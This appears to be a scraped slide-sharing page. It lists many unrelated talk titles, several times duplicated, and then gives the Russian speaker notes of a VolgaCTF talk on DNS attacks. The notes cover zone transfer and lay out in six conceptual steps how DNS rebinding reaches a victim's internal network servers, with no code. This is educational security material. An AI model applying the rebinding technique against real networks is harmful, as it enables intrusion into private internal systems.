Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John Staveley
 

VolgaCTF | Bo0oM - DNS and attacks

Editor's Notes

  1. децентрализованность
  2. Передача днс зоны, репликация днс сервера
  3. Правила ограничения домена
  4. Dns rebinding
  5. 1. Жертва обращается к домену, принадлежащему злоумышленнику. 2. Получает с DNS-сервера IP-адрес, соответствующий доменному имени. 3. Обращается на веб-сервер, соответствующий полученному IP, и получает с него сценарий JavaScript. 4. Полученный JavaScript через некоторое время после загрузки инициирует повторный запрос на сервер. 5. В этот момент атакующий с помощью межсетевого экрана блокирует все запросы жертвы к серверу. 6. Браузер пытается повторно узнать IP-адрес сервера, послав соответствующий DNS-запрос, и на этот раз получает IP-адрес уязвимого сервера из локальной сети жертвы.